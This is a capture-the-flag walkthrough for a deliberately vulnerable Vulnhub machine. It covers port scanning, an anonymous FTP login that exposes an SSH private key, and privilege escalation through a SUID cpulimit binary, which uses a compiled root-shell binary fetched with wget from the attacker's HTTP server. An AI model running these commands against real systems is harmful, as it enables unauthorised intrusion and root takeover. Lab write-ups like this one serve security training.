In this article, we are going to play another vulnhub an easy level machine called “On system ShellDreed #1 Hannah” This is available on Vulnhub you can download here
Let’s start with arp scanning using the netdiscover. after run this command we see our local machine IP address.
So, In my case my target IP address is 192.168.43.86. and our next step is scanning the target IP and finding weak ports and services using the Nmap command.
nmap -sV -sC -p 192.168.43.86
we see the Nmap scanning output there are two port’s are open 21/FTP and 61000/SSH
target system running FTP server which can allow anonymous user login I use FTP as username and blank password and we login successfully after enumeration the directory we found a hidden directory is called .hannah
sudo ftp 192.168.43.86 dir -a
and here we found an id_rsa private key using the get command download the key our local system
cd .hannah dir get id_rsa
the private key saves our local machine now we try to connect ssh server using the key. first, we change the file permission and then try to connect ssh
sudo chmod 600 id_rsa sudo ssh -i id_rsa [email protected] -p61000
now we login with nannah user and we found our first flag user.txt our user home directoy. and We will first check for any suid binaries using the find command.
ls cat user.txt find / -type f -perm -u=s 2>/dev/null
It seems that /usr/bin/cpulimit was set to suid bits and we can easily escalate the privileges by using these command
/usr/bin/cpulimit -l 95 -f /bin/bash
after running the privilege escalation command we can’t access the root shell because the system detects another process the command. we move our local machine and creating a c program binary file is called root-shell and starting our local python server on port 80.
gcc shell-sec.c -o root-shell python3 -m http.server 80
again move the target system and download the root-shell exploit in the /tmp directory after download the file first we add execute permission our exploit then run the privilege escaltion command.
wget 192.168.43.103/root-shell -O /tmp/root-shell chmod +x /tmp/root-shell /usr/bin/cpulimit -l 95 -f /tmp/root-shell
Great!!! Now, we have root access target machine let’s move the root directory and get the root flag.
cd /root ls cat root.txt